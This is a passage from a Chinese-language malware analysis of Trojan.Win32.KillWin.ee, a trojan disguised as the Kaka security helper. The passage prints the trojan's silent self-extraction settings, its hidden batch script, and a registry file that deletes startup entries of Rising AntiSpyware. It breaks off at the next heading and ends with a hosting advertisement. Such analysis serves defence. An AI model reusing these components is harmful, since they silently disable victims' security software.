對清除Trojan.Win32.KillWin.ee病毒的方案分析(1)

而安全軟件在此時卻顯得力不從心，因為很多病毒木馬在發作前都開始解除安軟的保護功能，這不新出現的Trojan.Win32.KillWin.ee也具備此種功能。

病毒日新月異的今天，越來越多的偽裝及新型變種是一天接一天的瘋狂，面對如此情況，很多網民是只能一次又一次的進行系統還原或者是重裝系統。而安全軟件在此時卻顯得力不從心，因為很多病毒木馬在發作前都開始解除安軟的保護功能，這不新出現的Trojan.Win32.KillWin.ee也具備此種功能。

病毒分析

該病毒名為Trojan.Win32.KillWin.ee，文件雖然只有小小的169 KB(173,614 字節)，但其威力卻不容小視。病毒為WINRAR自解壓縮包格式，可通過修改自身圖標為卡卡助手的標識來進行偽裝自身。

當Trojan.Win32.KillWin.ee病毒進駐到用戶計算機后，會釋放BAT和REG命令的執行文件，并利用命令方式刪除用戶計算機中的卡卡助手啟動項，禁止其真實的程序啟動，然后通過劫持卡卡的主程序并將其指向病毒主體gameover.exe程序。

該程序在使用自動解壓縮命令解壓自身后開始進行系統破壞，其自解壓命令如下：

Path=%SystemRoot%\system32\

SavePath

Setup=hidecmd.exe kv.bat

Silent=1

Overwrite=1

執行hidecmd.exe(隱藏執行BAT)用參數調用kv.bat隱藏執行。

kv.bat的內容為：

@echo off

%SystemRoot%\regedit /s kaka.reg

%SystemRoot%\regedit /s gameover.reg

Exit

病毒修改注冊表

在結束上述命令后，Trojan.Win32.KillWin.ee病毒源體開始接著導入到系統中兩個REG文件，來修改注冊表，其內容如下：

kaka.reg：

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]

"KKDelay"="C:\\Program Files\\Rising\\AntiSpyware\\RunOnce.exe"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"runeip"="\"C:\\Program Files\\Rising\\AntiSpyware\\runiep.exe\" /startup"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents]

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL]

"Installed"="1"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI]

"Installed"="1"

"NoChange"="1"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS]

"Installed"="1"

病毒刪除卡卡助手

服務器租用/服務器托管中國五強！虛擬主機域名注冊頂級提供商！15年品質保障！--億恩科技[ENKJ.COM]